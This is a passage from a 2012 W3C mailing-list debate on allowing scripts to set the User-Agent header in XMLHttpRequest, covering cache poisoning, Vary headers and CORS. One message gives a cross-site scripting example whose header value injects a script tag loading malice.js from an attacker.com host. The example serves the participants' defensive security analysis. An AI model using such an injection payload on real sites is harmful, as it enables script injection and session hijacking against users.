RE: RE: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Jungkee Song
 -Original Message-
 From: Hallvord Reiar Michaelsen Steen [mailto:hallv...@opera.com]
 Sent: Wednesday, October 17, 2012 3:50 PM
 
   The point is that a browser can act as if every single server response
   included Vary: User-Agent.  And perhaps should.  Intermediary caches
   _certainly_ should.
 
 
 
 Good suggestion.


But my concern was even if browser acts as such, intermediary caches would 
still return forged content in its cache rather than trying to make a fresh 
request to origin server. That is, authors would expect that they are free from 
cache poisoning threat based off of the spec, but it might not be true when 
caching proxy is involved. Unless server itself actually puts Vary: 
User-Agent in the response, we cannot entirely avoid the cache poisoning 
scenario.


Jungkee

 Julian Aubourg wrote;
   I'm still more concerned about potentially legitimate use cases of
  User-Agent filtering that could lead to security breaches when removing
  User-Agent from the non-modifiable list. But if no-one else feels like
 there
 
  could ever be such a legitimate use-case
 
 
 So far we haven't heard from anyone who has seen or implemented such a
 solution in real life ;-).
 
 
  Neither do I disagree to take User-Agent header out of the non-
 modifiable
  list as far as we resolve the possible issues. Before we make decision,
 I
  would like to bring some other issues found in an article [1]:
 
(quoted from [1])
   A few of the problems include:
  
   1. Many websites will return only error pages upon receiving a UA
 header
  over a fixed length (often 256 characters).
 
  Should we specify the length of the header that the script allows in the
  spec?
 
 
 
 I think the spec should try to allow JS authors to work around buggy
 servers rather than attempting to work around server bugs ourselves. This
 may be a general issue with header lengths, though, just seen more
 frequently with User-Agent because of all the junk some setups add to it,
 but I don't think it makes sense to mandate that second argument to
 setRequestHeader() must be less than 256 characters.
 
 
 If anything, this makes it more useful to be able to set User-Agent - if
 you're writing an app for users with lots of junk in the UA string and
 want to load data from a server that can't handle that ;-)
 
 
   2. In IE7 and below, if the UA string grows to over 260 characters,
 the
  navigator.userAgent property is incorrectly computed.
 
  IE specific case. I don't think we will change the navigator.userAgent
 with
  XHR request.
 
 
 
 Correct. This doesn't apply.
 
 
   3. Poorly designed UA-sniffing code may be confused and misinterpret
  tokens in the UA.
 
  Sanitizing the header value could be considered.
 
 
 
 We could, but figuring out some sensible rules that will handle the world
 wild web's poorly designed sniffing would take us a while ;-)
 
   4. Poorly designed browser add-ons are known to misinterpret how the
  registry keys are used, and shove an entire UA string into one of the
 
  tokens, resulting in a nested UA string.
 
 
 This problem doesn't apply to us.
 
   5. Because UA strings are sent for every HTTP request, they entail a
  significant performance cost. In degenerate cases [2], sending the UA
 string
  might consume 50% of the overall request bandwidth.
 
 
 
 Also something that's probably  best left to the JS author's unpredictable
 needs IMO.
 -Hallvord
 
 
  [1]
  http://blogs.msdn.com/b/ieinternals/archive/2009/10/08/extending-the-
 user-ag
  ent-string-problems-and-alternatives.aspx
  [2]
  http://brianary.blogspot.com/2009/07/internet-explorer-user-agent-
 spam.html
 
 
  Jungkee
 
 --
 Hallvord R. M. Steen
 Core tester, Opera Software
 
 
 





Re: RE: RE: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Hallvord Reiar Michaelsen Steen

The point is that a browser can act as if every single server response
included Vary: User-Agent.  And perhaps should.  Intermediary caches
_certainly_ should.
  
  
  
  Good suggestion.
 
 

 But my concern was even if browser acts as such, intermediary caches would 
 still return forged content


I guess UAs *could* add a Cache-control: no-cache request header when getting a 
resource that was previously retrieved with a different UA string - this is 
getting very fiddly though.

-- 
Hallvord R. M. Steen
Core tester, Opera Software








Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Aryeh Gregor
(I noticed people talking about this on IRC and commented, and zcorpan
pointed me to this thread.)

On Tue, Oct 16, 2012 at 7:08 PM, Boris Zbarsky bzbar...@mit.edu wrote:
 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.

In terms of correctness, yes, but that will make them useless as
caches.  If a moderate number of users with an assortment of browsers
are using the same caching proxy, it's entirely possible that no two
of them have the same exact User-Agent string.  Varying on User-Agent
in a heterogeneous browser environment is going to drop your cache hit
rate to the point where the cache hurts performance more than it
helps.

Proxy caching is always going to break some pages, because not all
pages serve correct caching headers.  This can cause them to break
just due to browser cache too, but more caching is going to break them
more.  So proxy caching is always a correctness-performance tradeoff.
In practice, the loss in correctness is not worth the added
performance for most users, which is why most Internet users are not
(I think?) behind any sort of client-side proxy caching layer.  (I'm
not counting reverse proxies here.)  Where the performance gain is
worth it, such as behind an expensive or high-latency link, users will
just have to be trained to try pressing Ctrl-F5 if pages break.



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Boris Zbarsky

On 10/17/12 12:17 AM, Jungkee Song wrote:

Yes, that could solve the issue, but it seems we cannot avoid the
intermediary caching proxy problem unless server actually put Vary:
User-Agent in every response. I'm wondering if it's still worth to put it
into spec.


Again, any intermediary proxy that doesn't assume that is in practice 
broken with real-world content...



Should we specify the length of the header that the script allows in the
spec?


That does not seem necessary.  In particular, the only thing this would 
hurt is the script making the request, right?



3. Poorly designed UA-sniffing code may be confused and misinterpret

tokens in the UA.

Sanitizing the header value could be considered.


Yes.

-Boris



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Boris Zbarsky

On 10/17/12 3:36 AM, Jungkee Song wrote:

But my concern was even if browser acts as such, intermediary caches would still return 
forged content in its cache rather than trying to make a fresh request to origin server. 
That is, authors would expect that they are free from cache poisoning threat based off of 
the spec, but it might not be true when caching proxy is involved. Unless server itself 
actually puts Vary: User-Agent in the response, we cannot entirely avoid the 
cache poisoning scenario.


That's true.  And while such a caching proxy would, once again, be 
broken on real-world content, that doesn't help the security situation.


Does sanitizing the UA value to exclude certain chars (most 
particularly, '' and company) help enough here?


-Boris



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Boris Zbarsky

On 10/17/12 4:34 AM, Hallvord Reiar Michaelsen Steen wrote:

I guess UAs *could* add a Cache-control: no-cache request header when getting a resource 
that was previously retrieved with a different UA string - this is getting very 
fiddly though.


Hmm.  In similar vein, UAs could Cache-control: no-cache requests that 
have a custom UA set via XHR.  It's tempting.


-Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Julian Aubourg
I tend to agree with Boris on this one.

Couldn't we simply state in the spec that browsers must add the User-Agent
header to the Vary list, all the time? That would instantly solve the
attack-from-the-cache problem, right? No need to sanitize the data, no need
to negotiate anything between both ends.

If that's the only security threat, it actually seems quite simple to
disable.

I'm still more concerned about potentially legitimate use cases of
User-Agent filtering that could lead to security breaches when removing
User-Agent from the non-modifiable list. But if no-one else feels like
there could ever be such a legitimate use-case, then I don't think we
should hold back because of this out-of-cache XSS attack: let's just
specify User-Agent has to be in Vary all the time. It's not like it will
break caching in the general case anyway.

Le mardi 16 octobre 2012, Boris Zbarsky a écrit :

 On 10/16/12 8:44 AM, Hallvord Reiar Michaelsen Steen wrote:

 xhr=new XMLHttpRequest();
 xhr.setRequestHeader('User-**Agent', '--script src=
 http://attacker.com/**malice.js http://attacker.com/malice.js
 /script!--');


 For what it's worth, I would have no problem sanitizing the header value
 for User-Agent if we allow script to set it, or throwing on certain values;
 I can't think of any legit use cases for values containing '', since no
 actual UAs do that.

  and then requests /publicdata/index.htm . Once the request reaches
 readyState=4, attacker's page does

 location.href='http://www.**victim.com/publicdata/index.**htmhttp://www.victim.com/publicdata/index.htm
 ';

 The browser has a fresh copy - loaded with the xhr request just
 milliseconds ago - and fetches the page from cache. Voila, the browser is
 now rendering a victim.com page with a link to malice.js included and
 the attacker can do whatever from the JS now running in the scope of the
 site.


 Again, Vary: User-Agent is the answer here, from the browser's point of
 view.  I agree that this would be good to discuss in a security
 implications section.  The spec could even require that responses to XHR
 with custom UA simply not be cached, if we want to play it safe.

  so the threat scenario relies on the remote server being stupid enough to
 do that and yet be careless about echoing non-sanitised User-Agent strings
 back to the page. Which is basically the negotiation scenario Julian
 earlier said he would agree to, and the reason I'm still pondering if it
 would be worth the extra complexity to allow it for cross-domain requests
 only...but this sort of cache poisoning scenario is a concern..


 Right, I agree it's a concern.  I think it's an easy one to address for
 this narrow use case.

 -Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Mark Baker
On Tue, Oct 16, 2012 at 11:21 AM, Boris Zbarsky bzbar...@mit.edu wrote:
 Again, Vary: User-Agent is the answer here, from the browser's point of
 view.

Agreed.

 I agree that this would be good to discuss in a security implications
 section.  The spec could even require that responses to XHR with custom UA
 simply not be cached, if we want to play it safe.

That would be an improvement, but wouldn't solve the problem of
intermediary cache poisoning.

Julian Aubourg wrote;
 Couldn't we simply state in the spec that browsers must add the User-Agent 
 header to the Vary list, all the time?

Vary is a response header, set by the server.

Mark.



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Boris Zbarsky

On 10/16/12 1:04 PM, Mark Baker wrote:

That would be an improvement, but wouldn't solve the problem of
intermediary cache poisoning.


Ah, yes. Intermediary caches are indeed a problem.  I don't see anything 
the browser can do to solve that problem, unfortunately.


On the other hand, caches that don't assume Vary: User-Agent are 
already completely broken on the web when they sit between multiple 
users using multiple browsers and the rest of the web



Julian Aubourg wrote;

Couldn't we simply state in the spec that browsers must add the User-Agent 
header to the Vary list, all the time?


Vary is a response header, set by the server.


The point is that a browser can act as if every single server response 
included Vary: User-Agent.  And perhaps should.  Intermediary caches 
_certainly_ should.


-Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Julian Aubourg


 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.


Yes, that was my point. Do as if User-Agent was part of the Vary response
header.


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Mark Baker
On Tue, Oct 16, 2012 at 1:08 PM, Boris Zbarsky bzbar...@mit.edu wrote:
 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.

I don't have enough experience with that scenario to agree or
disagree, but if you feel strongly that the world would be better off
with this, you should make your case to the HTTP WG. It's possible it
would be considered out of scope for httpbis since it would seem to
change the protocol in an incompatible way. But it would at least get
on the radar for HTTP 2.0.

Mark.



RE: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Jungkee Song
 -Original Message-
 From: Boris Zbarsky [mailto:bzbar...@mit.edu]
 Sent: Wednesday, October 17, 2012 2:09 AM
 
 On 10/16/12 1:04 PM, Mark Baker wrote:
  That would be an improvement, but wouldn't solve the problem of
  intermediary cache poisoning.
 
 Ah, yes. Intermediary caches are indeed a problem.  I don't see anything
 the browser can do to solve that problem, unfortunately.
 
 On the other hand, caches that don't assume Vary: User-Agent are
 already completely broken on the web when they sit between multiple
 users using multiple browsers and the rest of the web

  Julian Aubourg wrote;
  Couldn't we simply state in the spec that browsers must add the User-
 Agent header to the Vary list, all the time?
 
  Vary is a response header, set by the server.
 
 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.


Yes, that could solve the issue, but it seems we cannot avoid the
intermediary caching proxy problem unless server actually put Vary:
User-Agent in every response. I'm wondering if it's still worth to put it
into spec.


Julian Aubourg wrote;
 I'm still more concerned about potentially legitimate use cases of
User-Agent filtering that could lead to security breaches when removing
User-Agent from the non-modifiable list. But if no-one else feels like there
could ever be such a legitimate use-case, then I don't think we should hold
back because of this out-of-cache XSS attack: let's just specify User-Agent
has to be in Vary all the time. It's not like it will break caching in the
general case anyway.

Neither do I disagree to take User-Agent header out of the non-modifiable
list as far as we resolve the possible issues. Before we make decision, I
would like to bring some other issues found in an article [1]:

  (quoted from [1])
 A few of the problems include:
 
 1. Many websites will return only error pages upon receiving a UA header
over a fixed length (often 256 characters).

Should we specify the length of the header that the script allows in the
spec?

 2. In IE7 and below, if the UA string grows to over 260 characters, the
navigator.userAgent property is incorrectly computed.

IE specific case. I don't think we will change the navigator.userAgent with
XHR request.

 3. Poorly designed UA-sniffing code may be confused and misinterpret
tokens in the UA.

Sanitizing the header value could be considered.

 4. Poorly designed browser add-ons are known to misinterpret how the
registry keys are used, and shove an entire UA string into one of the
tokens, resulting in a nested UA string.
 5. Because UA strings are sent for every HTTP request, they entail a
significant performance cost. In degenerate cases [2], sending the UA string
might consume 50% of the overall request bandwidth.
 

[1]
http://blogs.msdn.com/b/ieinternals/archive/2009/10/08/extending-the-user-ag
ent-string-problems-and-alternatives.aspx
[2]
http://brianary.blogspot.com/2009/07/internet-explorer-user-agent-spam.html


Jungkee




RE: [XHR] Open issue: allow setting User-Agent?

2012-10-15 Thread Jungkee Song
 -Original Message-
 From: Boris Zbarsky [mailto:bzbar...@mit.edu]
 Sent: Sunday, October 14, 2012 12:49 AM
 
 On 10/13/12 5:08 AM, Hallvord R. M. Steen wrote:
  I came across an article [1] that describes some of the reasoning for
  Flash's change in security policy when it banned setting User-Agent.
  Apparently, some sites echo the User-Agent value back in markup in
  certain contexts (maybe a browser requirements page for example).
 
 And naturally do not send Vary: User-Agent?

I'm not sure what Hallvord assumed here, but if certain backend intends to 
provide its content under some browser requirements, isn't Vary: User-Agent 
sort of a required header to have related caching proxy, if any, work 
correctly? Otherwise, subsequent requests on the same resource with different 
User-Agent string would be regarded as a cache HIT in caching proxy anyway.

Anyway, the point here is that if changing of User-Agent is allowed in script, 
it will be possible for malicious third party to set arbitrary User-Agent 
strings in generating XSS attacks.

To which Hallvord wrote:
  So it seems reasonable to keep the limitation on setting User-Agent. 

+1.

  (I'm still wondering if we could lift it only for the cross-domain case 
  where the target site must opt in to receiving a changed UA string though..)

-1. I don't know if there can be any smart way, but as of now I don't think it 
is a good way to determine the availability of setRequestHeader('User-Agent', 
...) depending on the choice of certain backend.


Jungkee


 
  However, another threat might be using an XHR request to put a
  generated page with injected content in the browser's cache, then
  opening the page directly in a new window. The page would likely be
  taken from cache
 
 This seems simple enough to deal with on the browser side: Assume Vary:
 User-Agent on all requests.  Probably a good idea anyway.
 
 -Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-15 Thread Boris Zbarsky

On 10/15/12 7:18 AM, Jungkee Song wrote:

but if certain backend intends to provide its content under some browser requirements, 
isn't Vary: User-Agent sort of a required header to have related caching 
proxy, if any, work correctly?


Yes, it is, but it's rare for websites to think about that sort of thing 
in my experience.


In particular, I have yet to encounter a site that both does server-side 
UA sniffing _and_ sends Vary: User-Agent.



Otherwise, subsequent requests on the same resource with different User-Agent 
string would be regarded as a cache HIT in caching proxy anyway.


Indeed.


Anyway, the point here is that if changing of User-Agent is allowed in script, 
it will be possible for malicious third party to set arbitrary User-Agent 
strings in generating XSS attacks.


While true, a third party can already do this with things like botnets, 
no?  I'm not sure I see the additional threats here.  Can you explain?


-Boris



RE: [XHR] Open issue: allow setting User-Agent?

2012-10-15 Thread Jungkee Song
 -Original Message-
 From: Boris Zbarsky [mailto:bzbar...@mit.edu]
 Sent: Monday, October 15, 2012 9:50 PM
 
 On 10/15/12 7:18 AM, Jungkee Song wrote:
  but if certain backend intends to provide its content under some browser
 requirements, isn't Vary: User-Agent sort of a required header to have
 related caching proxy, if any, work correctly?
 
 Yes, it is, but it's rare for websites to think about that sort of thing
 in my experience.
 
 In particular, I have yet to encounter a site that both does server-side
 UA sniffing _and_ sends Vary: User-Agent.

Yes, I think it's very rare. I found that a Korean web portal site, Naver, 
does send Vary:Accept-Encoding,User-Agent upon the request to 
http://www.naver.com; and http://m.naver.com;, though.

  Otherwise, subsequent requests on the same resource with different User-
 Agent string would be regarded as a cache HIT in caching proxy anyway.
 
 Indeed.
 
  Anyway, the point here is that if changing of User-Agent is allowed in
 script, it will be possible for malicious third party to set arbitrary
 User-Agent strings in generating XSS attacks.
 
 While true, a third party can already do this with things like botnets,
 no?  I'm not sure I see the additional threats here.  Can you explain?

From that perspective, I don't think setting the User-Agent string in script 
poses any unknown treats. However, it seems like we are permitting another 
choice which is simply calling a JavaScript function.

FYI, here is another article [1] written about the compatibility problem on 
changing the UA string at runtime.

[1] 
http://blogs.msdn.com/b/ieinternals/archive/2009/10/08/extending-the-user-agent-string-problems-and-alternatives.aspx


Jungkee




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-13 Thread Hallvord R. M. Steen
I came across an article [1] that describes some of the reasoning for  
Flash's change in security policy when it banned setting User-Agent.  
Apparently, some sites echo the User-Agent value back in markup in  
certain contexts (maybe a browser requirements page for example).  
Being able to set User-Agent from web content thus might cause XSS  
issues for such pages. These backends never had any reason to filter  
the User-Agent string before, so they probably don't.


Obviously, any XSS-injected scripts would not run as a result of  
simply loading the content with XHR (or Flash) - scripts in the  
response are not executed unless more steps are taken like jQuery's  
global eval taking SCRIPT tags from received markup and inserting them  
into the page. However, another threat might be using an XHR request  
to put a generated page with injected content in the browser's cache,  
then opening the page directly in a new window. The page would likely  
be taken from cache, and the XSS would be successful. So it seems  
reasonable to keep the limitation on setting User-Agent. (I'm still  
wondering if we could lift it only for the cross-domain case where the  
target site must opt in to receiving a changed UA string though..)


[1] http://www.securityfocus.com/archive/1/441014




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-13 Thread Boris Zbarsky

On 10/13/12 5:08 AM, Hallvord R. M. Steen wrote:

I came across an article [1] that describes some of the reasoning for
Flash's change in security policy when it banned setting User-Agent.
Apparently, some sites echo the User-Agent value back in markup in
certain contexts (maybe a browser requirements page for example).


And naturally do not send Vary: User-Agent?


However, another threat might be using an XHR request to put a
generated page with injected content in the browser's cache, then
opening the page directly in a new window. The page would likely be
taken from cache


This seems simple enough to deal with on the browser side: Assume Vary: 
User-Agent on all requests.  Probably a good idea anyway.


-Boris



RE: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Jungkee Song
I don't think it is a right and wrong discussion. There's valid rationale for 
both pros and cons. 

Having mulled it over, I am leaning to not removing User-Agent from the list of 
prohibited headers at least in the current version. I admit that the use case 
is compelling to certain group of authors (mainly testing and analyzing 
purpose) but don't think it acquires consensus for the whole web. Besides, IMO 
browser spoofing either through the browser's main HTTP request or XHR request 
is not the ultimate way to handle the browser sniffing issues in practical 
service scenarios.

Jungkee

 -Original Message-
 From: Hallvord R. M. Steen [mailto:hallv...@opera.com]
 Sent: Wednesday, October 10, 2012 12:34 AM
 To: Julian Aubourg; annevankeste...@gmail.com
 Cc: Anne van Kesteren; Jungkee Song; public-webapps@w3.org
 Subject: Re: [XHR] Open issue: allow setting User-Agent?
 
 Julian Aubourg j...@ubourg.net skreiv Tue, 09 Oct 2012 16:34:08 +0200
 
  I've had trouble writing extensions and user scripts to work around
  backend sniffing, due to being unable to simply set User-Agent for a
  specific script-initiated request and get the correct content. As
 I've
  attempted to explain to Anne, I think this experience is relevant to
  scripts using CORS, because they also want to interact with backends
 the
  script author(s) don't choose or control.
 
   If the backend sniffs out (all or some) browsers, it's the backend's
  choice.
 
 We end up in a philosophical disagreement here :-) I'd say that whatever
 browser the user decides to use is the user's choice and the server should
 respect that.
 
  CORS has been specified so that you NEED a cooperative backend.
  Unlock a header and some other means to sniff you out will be found and
  used :/
 
 Anne van Kesteren also makes a similar point, so I'll respond to both:
 
  If you consider CORS you also need to consider that if we allow
  developers to set user-agent a preflight request would be required for
  that header (and the server would need to allow it to be custom). So
  it's not quite that simple and would not actually help.
 
 One word: legacy. For example Amazon.com might want to enable CORS for
 some of its content. The team that will do that won't necessarily have any
 intention of blocking browsers, but will very likely be unaware of the
 widespread browser sniffing in other parts of the Amazon backend. (With
 sites of Amazon's or eBay's scale, there is in my experience simply no
 single person who is aware of all browser detection and policies). Hence,
 there is IMO non-negligible risk that a large web service will be
 cooperative on CORS but still shoot itself in the foot with browser
 sniffing.
 
 If I write, say, a CORS content aggregator, I would want it to run in all
 browsers, not only those allowed by the content providers. And I'd want to
 be in control of that. Hence, in my view this issue is mostly a trade-off
 between something script authors may need and more theoretical purity
 concerns.
 
  The changed User-Agent will of course only be sent with the requests
  initiated by the script, all other requests sent from the browser will
  be normal. Hence, the information loss will IMO be minimal and probably
  have no real-world impact on browser stats.
 
  var XHR = window.XMLHttpRequest;
 
  window.XMLHttpRequest = function() {
 var xhr = new XHR(),
 send = xhr.send;
 xhr.send = function() {
 xhr.setRequestHeader( User-Agent, OHHAI! );
 return send.apply( this, arguments );
 };
 return xhr;
  };
 
 Yes, this could give a generic library like jQuery less control of the
 contents of *its* request. However, there will still be plenty of requests
 not sent through XHR - the browser's main GET or POST for the actual page
 contents, all external files loaded with SCRIPT, LINK, IMG, IFRAME, EMBED
 or OBJECT, all images from CSS styling etc. Hence I still believe the
 information loss and effect on stats will be minimal.
 
 Also, the above could be a feature if I'm working on extending a site
 where I don't actually fully control the backend - think a CMS I'm forced
 to use and have to work around bugs in even if that means messing with how
 jQuery sends its requests ;-).
 
  If your backend really relies on User-Agent header values to avoid
  being
  tricked into malicious operations you should take your site offline
  for a
  while and fix that ;-). Any malicious Perl/PHP/Ruby/Shell script a
  hacker
  or script kiddie might try to use against your site can already fake
  User-Agent
 
 
  Oh, I agree entirely. Except checking User-Agent is a quick and painless
  means to protect against malicious JavaScript scripts. I don't like the
  approach more than you do, but we both know it's used in the wild.
 
 I'm afraid I don't know how this is used in the wild and don't fully
 understand your concerns. Unless you mean we should protect dodgy SEO
 tactics sending full site contents to Google bot UAs

Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Hallvord R. M. Steen
Jungkee Song jungkee.s...@samsung.com skreiv Thu, 11 Oct 2012 10:56:53  
+0200


IMO browser spoofing either through the browser's main HTTP request or  
XHR request is not the ultimate way to handle the browser sniffing  
issues in practical service scenarios.


Well, it would be a lot nicer to write specs for an ideal ultimate world  
for sure ;-)


In *this* world, this limits what script authors can do in a way that will  
leave them unable to solve some problems.
However, that MAY still be a reasonable decision if there are good reasons  
to do so! I agree with you that this is a judgement call with both pros  
and cons.


In this specific case I don't understand the full reasoning behind the  
limitation. Some of the rationale sounds more like we think somebody once  
may have said it would cause a security problem. And I would like us to  
have a stronger rationale and more evidence when we limit what authors are  
allowed to do.


Maybe other members of public-webapps could help me out by suggesting  
threat scenarios and use cases where this limitation seems relevant?


--
Hallvord R. M. Steen
Core tester, Opera Software



Fwd: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Julian Aubourg
Sorry, I've been cut by keyboard short cuts :P

... so the burden of proof is on *you*. *You* have to establish the
consequences of making a backward incompatible change. Not brush away
arguments pro, or cons, to advance your agenda. Did you ask backend devs
why they white-listed browsers? Did you try and educate them? Did you ever
encounter any sensible use-case for this? Do you really want to break a lot
of backends expectations because you don't see the reason?

You have to be very careful with breaking backward compatibility. Just look
the jQuery's bug tracker for a prime example of what happens when you do.

We don't have to prove it is useful. We just have to prove it is used and
*you* brought this up yourself. Now you want to bypass this by pretty much
hacking client-side. Please make a compelling case for it.

 I still don't fully understand the scenario(s) you have in mind.

You're confusing the script's origin with the site's origin. XHR requests
from within a script are issued with the origin of the page that the script
is included into.

Now, read back your example but suppose the attack is to be pulled against
cnn.com. At a given time (say cnn.com's peek usage time), the script issues
a gazillions requests. Bye-bye server.

That's why I took the ad example. Hack a single point of failure (the ad
server, a CDN) and you can DOS a site using the resource from network
points all over the net. While the frontend dev is free to use scripts
hosted on third-parties, the backend dev is free to add a (silly but
effective) means to limit the number of requests accepted from a browser.
Simple problem, simple solution and the spec makes it possible.

Note that this use-case has nothing to do with filtering out a specific
browser btw. Yet you would break this with the change you propose.

Maybe it's not the best of examples. But I came up with this in something
like 5 minutes. I can't imagine there are no other ways to abuse this.

 This is a way more interesting (ab)use case. You're presuming that there
are web-exposed backend
 services that are configured to only talk to other backend servers, and
use a particular magic token
 in User-Agent as authentication? If such services exist, does being able
to send a server-like UA
 from a web browser make them significantly more vulnerable than being
able to send the same string
 from a shell script?

Same as above: single point of failure. You hack into a server delivering a
shared resource and you have as many unwilling agents participating into
your attack.

So far I see that only Jaredd seems to like the idea (in this thread
anyway):

 I agree with Hallvord, I cannot think of any additional *real* security
risk involved with setting the
 User-Agent header.  Particularly in a CORS situation, the server-side
will (should) already be
 authenticating the origin and request headers accordingly.  If there
truly is a compelling case for
 a server to only serve to Browser XYZ that is within scope of the open
web platform, I'd really like to
 hear tha

By that line of reasoning, I don't see why we need preflight in CORS and
specific authorisation from the server-side for content to be delivered
cross-domain. It is not *open*. After all since any backend could request
the resource without problem, why should browsers be limited?

But then again, the problem has nothing to do with CORS but with
third-party scripts that effectively steal the origin of the page that
includes them and the single point of failure problem that arises. That's
why JavaScript is as sandboxed as it is.

In all honesty, I'd love to be convinced that the change is without
consequences, but the more I think about it, the less likely it seems.

-- Forwarded message --
From: Julian Aubourg j...@ubourg.net
Date: 11 October 2012 14:47
Subject: Re: [XHR] Open issue: allow setting User-Agent?
To: Hallvord R. M. Steen hallv...@opera.com



We end up in a philosophical disagreement here :-) I'd say that whatever
 browser the user decides to use is the user's choice and the server should
 respect that.


I'm sorry but that's complete non-sense. The backend is the provider of the
data and has all the right when it comes to its distribution. If it's a
mistake on the backend's side (they filter out while they didn't intend to)
just contact the backend's maintainer and have them fix this server-side
problem... well... server-side.

You're trying to circumvent a faulty implementation server-side by breaking
a client-side related spec backward compatibility. If you can't see how
wrong the whole idea is, I'm afraid you didn't have to suffer the
consequences of such drastic changes in the past (I had to with script tag
injection and it was a just a pure client-side issue, nothing close to what
you're suggesting in term of repercussions).



 One word: legacy. For example Amazon.com might want to enable CORS for
 some of its content. The team that will do that won't necessarily have any
 intention

Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Glenn Maynard
On Thu, Oct 11, 2012 at 8:09 AM, Julian Aubourg j...@ubourg.net wrote:

  I still don't fully understand the scenario(s) you have in mind.

 You're confusing the script's origin with the site's origin. XHR requests
 from within a script are issued with the origin of the page that the script
 is included into.

 Now, read back your example but suppose the attack is to be pulled against
 cnn.com. At a given time (say cnn.com's peek usage time), the script
 issues a gazillions requests. Bye-bye server.


I'm confused.  What does this have to do with unblacklisting the User-Agent
header?

That's why I took the ad example. Hack a single point of failure (the ad
 server, a CDN) and you can DOS a site using the resource from network
 points all over the net. While the frontend dev is free to use scripts
 hosted on third-parties, the backend dev is free to add a (silly but
 effective) means to limit the number of requests accepted from a browser.
 Simple problem, simple solution and the spec makes it possible.


Are you really saying that backend developers want to use User-Agent to
limit the number of requests accepted from Firefox?  (Not one user's
Firefox, but all Firefox users, at least of a particular version,
combined.)  That doesn't make sense at all.  If that's not what you mean,
then please clarify, because I don't know any other way the User-Agent
header could be used to limit requests.

-- 
Glenn Maynard


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Mike Taylor

Julian,

On Thu, 11 Oct 2012 08:09:07 -0500, Julian Aubourg j...@ubourg.net wrote:


... so the burden of proof is on *you*. *You* have to establish the
consequences of making a backward incompatible change. Not brush away
arguments pro, or cons, to advance your agenda. Did you ask backend devs
why they white-listed browsers? Did you try and educate them? Did you  
ever
encounter any sensible use-case for this? Do you really want to break a  
lot

of backends expectations because you don't see the reason?


I personally have contacted hundreds of sites for these types of issues  
over the past few years. We've done the education, outreach, evangelism,  
etc. Success rates are very low, the majority are simply ignored.



We don't have to prove it is useful. We just have to prove it is used and
*you* brought this up yourself. Now you want to bypass this by pretty  
much

hacking client-side. Please make a compelling case for it.


I'm sorry but that's complete non-sense. The backend is the provider of  
the

data and has all the right when it comes to its distribution. If it's a
mistake on the backend's side (they filter out while they didn't intend  
to)

just contact the backend's maintainer and have them fix this server-side
problem... well... server-side.


This isn't feasible. There's a whole web out there filled with legacy  
content that relies on finding the string Mozilla or Netscape, for  
example. See also the requirements for navigator.appName,  
navigator.appVersion, document.all, etc. You can't even get close to  
cleaning up the mess of legacy code out there, so you work around it. And  
history repeats itself today with magical strings like Webkit and  
Chrome.


What of new browsers, how do they deal with this legacy content? The same  
way that current ones do, most likely -- by pretending to be something  
else.


aside

The burden of proof is on you. *You* ha


Emphasis with asterisks seems unnecessary aggressive. Perhaps  
unintentionally so. :)

/aside

Cheers,

--
Mike Taylor
Opera Software



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Julian Aubourg
 I personally have contacted hundreds of sites for these types of issues
 over the past few years. We've done the education, outreach, evangelism,
 etc. Success rates are very low, the majority are simply ignored.


I'm sorry to hear that. I really am. Still trying to have people stop
browser sniffing client-side. :(


 I'm sorry but that's complete non-sense. The backend is the provider of the
 data and has all the right when it comes to its distribution. If it's a
 mistake on the backend's side (they filter out while they didn't intend
 to)
 just contact the backend's maintainer and have them fix this server-side
 problem... well... server-side.


 This isn't feasible. There's a whole web out there filled with legacy
 content that relies on finding the string Mozilla or Netscape, for
 example. See also the requirements for navigator.appName,
 navigator.appVersion, document.all, etc. You can't even get close to
 cleaning up the mess of legacy code out there, so you work around it. And
 history repeats itself today with magical strings like Webkit and
 Chrome.

 What of new browsers, how do they deal with this legacy content? The same
 way that current ones do, most likely -- by pretending to be something else.


The problem is that the same reasoning can be made regarding CORS. We have
backends, today, that do not support it. I'm not convinced they actually
want to prevent Cross-Domain requests that come from the browser. Truth is
it depends on the backend. So why do we require server opt-in when it comes
to CORS? After all, it is just a limitation in the browser itself. Surely
there shouldn't be any issue given these URLs are already fetchable from a
browser provided the page origin is the same. You can even fetch them using
another backend or shell or whatever other means.

Problem is backends expect this limitation to be true. So very few actually
control anything because browsers on a page from another origin are never
supposed to request the backend. There is potential for abuse here.
Solution was to add an opt-in system. For backends that are not maintained,
behaviour is unchanged. Those that want to support CORS have to say so
explicitely.

If we had a mechanism to do the same thing for the fact of modifying the
UserAgent header, I wouldn't even discuss the issue. Target URL authorizes
UserAgent to be changed, browser accepts custom UserAgent, sends the
request and filtering that happened between the URL and the browser would
be bypassed (solving the problem Hallvord gave with devs working on a part
of a site and having to deal with some filtering above their heads). Could
work pretty much exactly like CORS custom headers are handled. Hell, it
could even be made generic and could potentially solve other issues.

What's proposed here is entirely different though: it's an all or nothing
